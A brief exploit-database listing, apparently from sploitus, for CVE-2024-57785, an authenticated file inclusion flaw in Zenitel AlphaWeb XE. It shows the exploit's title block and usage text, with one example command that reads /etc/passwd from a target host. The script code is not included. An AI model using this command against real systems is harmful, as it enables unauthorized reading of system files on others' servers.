Share
## https://sploitus.com/exploit?id=1F45393C-D8FA-5AAB-809C-AEF4A8C2A81F
# CVE-2024-57785

```
[*] Exploit Title: Authenticated File Inclusion Vulnerability on Zenitel AlphaWeb XE Version 11.2.3.10
[*] Date: 08/02/2025
[*] Exploit Author: Safvan Parakkal
[*] Vendor Website: https://www.zenitel.com/
[*] CVE: CVE-2024-57785

Usage: CVE-2024-57785.py [-h] -u URL -f FILE

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -f FILE, --file FILE  The file to read

Example : python3 CVE-2024-57785.py -u http://192.168.10.34 -f /etc/passwd
```